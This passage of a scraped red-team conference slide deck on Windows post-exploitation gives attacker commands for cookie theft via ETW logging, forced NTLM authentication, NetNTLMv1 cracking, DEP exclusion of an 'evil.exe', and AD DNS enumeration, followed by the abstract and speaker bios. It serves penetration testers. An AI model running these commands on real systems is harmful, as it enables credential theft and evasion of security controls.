  • 68. Abusing PORTPROXY LNK UNC attack to a share that doesn't exist Windows will auto-try WebDAV PORTPROXY on 80 out over IPv6/teredo Since Windows is connecting "internally" the hosts will auto-authenticate .. Invisible
  • 69. Stealing SSL Cookies logman start LogCookies -p Microsoft-Windows-WinInet -o logcookies.etl -ets wevtutil qe logcookies.etl /lf:true /f:Text | find /i "cookie added" wevtutil qe logcookies.etl /lf:true /f:Text | find /i "POST" logman stop LogCookies -ets Mark Baggett Source: http://pauldotcom.com/2012/07/post-exploitation-recon-with-e.html
  • 70. Breaking NetNTLMv1 http://markgamache.blogspot. com/2013/01/ntlm-challenge-response-is-100- broken.html PoC turns NetNTLMv1 into this format: $99$ASNFZ4mrze8lqYwcMegYR0ZrKbLfRoDz2Ag= Cloudcrack.com will turn that into straight NTLM in 23 hours.
  • 71. DEP Exclusions DEP OptOut can be annoying and stop binaries from running. Adding your binary to: HKLMSoftwareMicrosoftWindows NTCurrentVersionAppCompatFlagLayers with the value "DisableNXShowUI". Doesn’t work This does: rundll32 sysdm.cpl, NoExecuteAddFileOptOutList "C: tempevil.exe" Source: http://hackingnotes.com/post/add-executable-to-dep-exclusion-from-the-command-line
  • 72. Zone Transfer via AD Domain Admin can run this (powershell): PS C:Usersjdoe> get-wmiobject - ComputerName dc1 -Namespace rootmicrosoftDNS - Class MicrosoftDNS_ResourceRecord -Filter "domainname='projectmentor.net'" | select textrepresentation Source: http://marcusoh.blogspot.com/2012/06/enumerating-dns-records-with-powershell.html
  • 74. Zone Transfer via AD Users can run this (powershell): ● PS C:Usersjdoe> dns-dump.ps1 -zone projectmentor. net -dc dc1 ● C:> powershell -ep bypass -f dnsdump.ps1 -zone projectmentor.net -dc dc1 Code: https://github. com/mmessano/PowerShell/blob/master/dns- dump.ps1 Source: http://www.indented.co.uk/index.php/2009/06/18/mapping-the-dnsrecord-attribute/
  • 75. END @mubix @carnal0wnage Mubix “Rob” Fuller mubix@hak5.org Chris Gates chris@carnal0wnage.com
  • 76. Abstract A follow on to the Encyclopaedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats.
  • 77. Mubix Bio Mubix is a Senior Red Teamer. His professional experience starts from his time on active duty as United States Marine. He has worked with devices and software that run gambit in the security realm. He has a few certifications, but the titles that he holds above the rest is FATHER, HUSBAND and United States Marine.
  • 78. CG Bio Chris Gates: Chris joined LARES in 2011 as a Partner & Principal Security Consultant. Chris has extensive experience in network and web application penetration testing as well as other Information Operations experience working as an operator for a DoD Red Team and other Full Scope penetration testing teams (regular pentesting teams too). Chris holds a BS in Computer Science and Geospatial Information Science from the United States Military Academy at West Point and holds his… redacted…no one cares anyway. In the past, he has spoken at the United States Military Academy, BlackHat, DefCon, DerbyCon, Toorcon, Brucon, Troopers, SOURCE Boston, OWASP AppSec DC, ChicagoCon, NotaCon, and CSI. He is a regular blogger carnal0wnage.attackresearch.com